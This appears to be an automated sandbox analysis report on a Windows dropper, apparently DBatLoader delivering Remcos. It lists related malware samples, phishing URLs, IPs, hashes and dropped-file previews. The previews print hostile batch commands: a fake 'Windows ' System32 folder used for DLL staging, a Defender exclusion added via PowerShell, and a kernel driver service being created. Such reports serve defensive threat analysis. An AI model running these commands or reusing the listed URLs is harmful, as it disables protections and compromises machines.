                                                                                            https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-inGet hashmaliciousHTMLPhisherBrowse
                                                                                              Purchase_Order.5643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Quote_220124.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  #U03a0#U0391#U03a1#U0391#U0393#U0393#U0395#U039b5500001213#U0399#U0391.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    AwvDzosFPVPCmA2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      shipping_documents_PI_MLM_MAMM0012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        FUCHUNQUOTE04830A.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          SWF316012401180017.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            dual-spov-0006.spov-msedge.netSecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • 13.107.137.11
                                                                                                            SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • 13.107.139.11
                                                                                                            DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                            • 13.107.137.11
                                                                                                            fBb1IzrM3E.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                            • 13.107.139.11
                                                                                                            Znokqyctuubnie.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                            • 13.107.139.11
                                                                                                            3002918291829182.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                            • 13.107.137.11
                                                                                                            PI_and_payment_confirmed.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                            • 13.107.137.11
                                                                                                            best.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 13.107.139.11
                                                                                                            Stmt_2024-01.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                            • 13.107.139.11
                                                                                                            fattura proforma pdf.exe.xzGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            • 13.107.139.11
                                                                                                            api4.ipify.orgrnarud__ba20226_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            rSOA(PLWW)-Jan2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            G9iohzB8uV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            HS44892321-T01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-inGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 64.185.227.156
                                                                                                            Purchase_Order.5643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            MAEU233851403_VerifyCopy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            BorradorRenta.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 104.237.62.211
                                                                                                            PO22134.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            Ordine_nr._D12201437_pdf_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.237.62.211
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            SECUREDSERVERS-EUfile.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                                                                                            • 185.52.54.43
                                                                                                            DOCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.56.136.50
                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.15104.27349.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.56.136.50
                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.6174.27930.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.56.136.50
                                                                                                            SHIPPING-DOCS.exeGet hashmaliciousAgentTesla, DBatLoader, RedLine, zgRATBrowse
                                                                                                            • 185.56.136.50
                                                                                                            INQUIRY7908-PDF.exeGet hashmaliciousAgentTesla, DBatLoader, RedLine, zgRATBrowse
                                                                                                            • 185.56.136.50
                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.13470.11348.exeGet hashmaliciousAgentTesla, DBatLoader, RedLine, zgRATBrowse
                                                                                                            • 185.56.136.50
                                                                                                            DOC001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.56.136.50
                                                                                                            PO9823.exeGet hashmaliciousAgentTesla, DBatLoader, RedLine, zgRATBrowse
                                                                                                            • 185.56.136.50
                                                                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 131.153.16.206
                                                                                                            WEBNXUSrnarud__ba20226_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            rSOA(PLWW)-Jan2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            G9iohzB8uV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            HS44892321-T01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            https://bafybeif2sotnvj6iazxaiz45l2jhmichgbvys2bccs2di4oolslqz5kk7a.ipfs.cf-ipfs.com/?accounts.intuit.com/app/sign-inGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 64.185.227.156
                                                                                                            Purchase_Order.5643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            MAEU233851403_VerifyCopy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            BorradorRenta.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 104.237.62.211
                                                                                                            PO22134.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 64.185.227.156
                                                                                                            Ordine_nr._D12201437_pdf_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.237.62.211
                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSClint Helton shared Dynagrid Construction LLC with you (22.5 KB).msgGet hashmaliciousSharepointPhisherBrowse
                                                                                                            • 52.109.8.89
                                                                                                            bThK.exeGet hashmaliciousNjratBrowse
                                                                                                            • 20.234.71.164
                                                                                                            Superior Case #SUCV2023050745 PeachCourt Notifications From LAW FIRM - 3 page(s).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.47.64.28
                                                                                                            https://upvir.al/154980/lp154980Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 52.96.173.178
                                                                                                            https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--AtocETicket&~campaign=WebToApp&~tags=locale%3Den_GB&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Den-GB&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FGB%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=http://schools.ph/laku/mako/wqowc8/sergio.tortola@cellnextelecom.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 52.96.119.82
                                                                                                            https://www.google.com/url?q=https%3A%2F%2Fcollectivedoc.top%2Fz32t5p3%2F&sa=D&sntz=1&usg=AOvVaw30zt8WoGNzb9nnVGI9mZyRGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.213.40
                                                                                                            Bjrfyyjj.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                            • 150.171.43.11
                                                                                                            https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//bridgemediaads.co.za/htm/ssl/http/K1YBQ7DVK5OPXN7DIZDU0G2W0I_=/.filepage/vivi//yu@tru.caGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.213.40
                                                                                                            readme.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                            • 20.69.178.82
                                                                                                            https://gqmimgoffer.blob.core.windows.net/gqmimgoffer/url.html#cl/10174_md/2001/7684/1802/153/180101Get hashmaliciousPhisherBrowse
                                                                                                            • 20.209.1.65
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ernarud__ba20226_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            rSOA(PLWW)-Jan2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            G9iohzB8uV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            https://northindiasf.com/index.htmlGet hashmaliciousPhisherBrowse
                                                                                                            • 173.231.16.75
                                                                                                            HS44892321-T01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            how to do self attested on documents 82699.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 173.231.16.75
                                                                                                            how to do self attested on documents 82699.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 173.231.16.75
                                                                                                            http://abyssalforge.topGet hashmaliciousUnknownBrowse
                                                                                                            • 173.231.16.75
                                                                                                            https://www.google.com/url?q=https%3A%2F%2Fcollectivedoc.top%2Fz32t5p3%2F&sa=D&sntz=1&usg=AOvVaw30zt8WoGNzb9nnVGI9mZyRGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 173.231.16.75
                                                                                                            Purchase_Order.5643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 173.231.16.75
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Bjrfyyjj.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                            • 13.107.139.11
                                                                                                            Invoice 23457538_PDF.vbsGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                            • 13.107.139.11
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.139.11
                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                            • 13.107.139.11
                                                                                                            prezi-windows.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.139.11
                                                                                                            file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                            • 13.107.139.11
                                                                                                            prezi-windows.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.139.11
                                                                                                            BILL47189.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                            • 13.107.139.11
                                                                                                            8XLr3uh4bB.exeGet hashmaliciousAmadey, RisePro Stealer, XmrigBrowse
                                                                                                            • 13.107.139.11
                                                                                                            https://help-users-solve-problems-c8a.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.139.11
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\Public\Libraries\netutils.dllBjrfyyjj.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                              PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                                                                                SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                      C:\Users\Public\Libraries\easinvoker.exeBjrfyyjj.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                        PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                              DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                Stmt_2024-01.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                  Invoice0017861201.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                    Order151smapl.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                      n6dS0UI5yA.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                        Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Clmgncrs.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):100
                                                                                                                                          Entropy (8bit):5.037404160633783
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMXECSsb5itKPn:HRYFVmTWDyz8ZSE5OKPn
                                                                                                                                          MD5:A2A649BB289C50B292C5778F7D723B26
                                                                                                                                          SHA1:3B92394E450C898E97E31B1F8CF9FEBC3F959E0A
                                                                                                                                          SHA-256:09E0C96ECBEA303E794BCF9E90B4D69067576784D8D08F51B4B26F722A5B28C3
                                                                                                                                          SHA-512:7436C780AB3463A50E35CE15532F6063DF9CA21412B80780CF776BB4EEE3F010D52A399227EEFE931ECC316BDBE4E7F559C76F26C43ABC0F9DCDA3BD63C2DF6C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Clmgncrs.PIF"..IconIndex=12..HotKey=98..
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1693184
                                                                                                                                          Entropy (8bit):7.4228083954221695
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:iyB7eQVOovzwkKEFL3WlrpY7Gv1eeajEja3KgffHCx2GwV/6ltVIaH3:D9VmuL3WZ7vcVjEvGHaKViFJ3
                                                                                                                                          MD5:39AD433C9BA920E7FD0961C66AC7079E
                                                                                                                                          SHA1:8A54961347EAB2253E2004E33F399C4CD07C8577
                                                                                                                                          SHA-256:E1471B0576C26D33B4FDA732A7E0ABA43193849EF1DE6BBCDD42E8724354DD00
                                                                                                                                          SHA-512:676DA03F46446AD3A6E83E7B0D6648E6C82E25D0866FBE13F85EA0A3EC6FFB9FB507B28AE69638A4CF62D51B0AEFB934BD20D77605A78D1F8652EF2FD5D38B71
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@....................@..........................p...................@...............................%...@..........................da..................................................8................................text............................... ..`.itext.............................. ..`.data...............................@....bss....p6...@...........................idata...%.......&..................@....tls....4............D...................rdata...............D..............@..@.reloc..da.......b...F..............@..B.rsrc........@......................@..@.............p......................@..@................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):404
                                                                                                                                          Entropy (8bit):5.010767804598093
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
                                                                                                                                          MD5:6880148D6CD8FABDCE94B7E91DBD8D17
                                                                                                                                          SHA1:870E9AD13355A8452746E0904D004EE8C8EC66E5
                                                                                                                                          SHA-256:0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
                                                                                                                                          SHA-512:810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):271
                                                                                                                                          Entropy (8bit):4.820351746235622
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
                                                                                                                                          MD5:D62B11DC4DC821EF23260E5B0E74A835
                                                                                                                                          SHA1:CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
                                                                                                                                          SHA-256:D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
                                                                                                                                          SHA-512:27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4
                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Svn:Svn
                                                                                                                                          MD5:183EE5C38F5718616E4D909D5298B395
                                                                                                                                          SHA1:B7966E63431A31FFE6CB52BFD4A444AFC57C2F0B
                                                                                                                                          SHA-256:8CE88A8842C1584E3D6871E84E166E3B513C3CE2A9DA6166760C7AF1645DEA29
                                                                                                                                          SHA-512:5ED5220EFF4DBAD962E3675234B322EE728584E9EF561A4D973AEF614EA2E96D9E68BD20A729CF4D4CDEE685EC347452AFE6AC0DC1B0AC426721D50CA6F666AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:20..
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):131648
                                                                                                                                          Entropy (8bit):5.225468064273746
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                          MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                          SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                          SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                          SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: Bjrfyyjj.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse
                                                                                                                                          • Filename: DF0987890000.scr.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Stmt_2024-01.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Invoice0017861201.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Order151smapl.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: n6dS0UI5yA.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe, Detection: malicious, Browse
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):117430
                                                                                                                                          Entropy (8bit):5.039733311717682
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
                                                                                                                                          MD5:96B99E2A886D816C1B98B018ADFE6311
                                                                                                                                          SHA1:41F2F29BD8F366781ED1387068150EB2789DBBF8
                                                                                                                                          SHA-256:C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
                                                                                                                                          SHA-512:6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: Bjrfyyjj.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse
                                                                                                                                          • Filename: DF0987890000.scr.exe, Detection: malicious, Browse
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):175800
                                                                                                                                          Entropy (8bit):6.631791793070417
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                          MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                          SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                          SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):53696
                                                                                                                                          Entropy (8bit):6.830243356027624
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
                                                                                                                                          MD5:F53FA44C7B591A2BE105344790543369
                                                                                                                                          SHA1:363068731E87BCEE19AD5CB802E14F9248465D31
                                                                                                                                          SHA-256:BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
                                                                                                                                          SHA-512:55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............|..............@..B........................................................................................................................................................................................
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.4228083954221695
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          File name:SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          File size:1'693'184 bytes
                                                                                                                                          MD5:39ad433c9ba920e7fd0961c66ac7079e
                                                                                                                                          SHA1:8a54961347eab2253e2004e33f399c4cd07c8577
                                                                                                                                          SHA256:e1471b0576c26d33b4fda732a7e0aba43193849ef1de6bbcdd42e8724354dd00
                                                                                                                                          SHA512:676da03f46446ad3a6e83e7b0d6648e6c82e25d0866fbe13f85ea0a3ec6ffb9fb507b28ae69638a4cf62d51b0aefb934bd20d77605a78d1f8652ef2fd5d38b71
                                                                                                                                          SSDEEP:24576:iyB7eQVOovzwkKEFL3WlrpY7Gv1eeajEja3KgffHCx2GwV/6ltVIaH3:D9VmuL3WZ7vcVjEvGHaKViFJ3
                                                                                                                                          TLSH:0675DF93368081F2D1310538DF6AD5F9897F7E782925E05A32C8BEDCBF7A64265082D7
                                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                          Icon Hash:62e080a2ab92a3a2
                                                                                                                                          Entrypoint:0x45a79c
                                                                                                                                          Entrypoint Section:.itext
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                          DLL Characteristics:
                                                                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
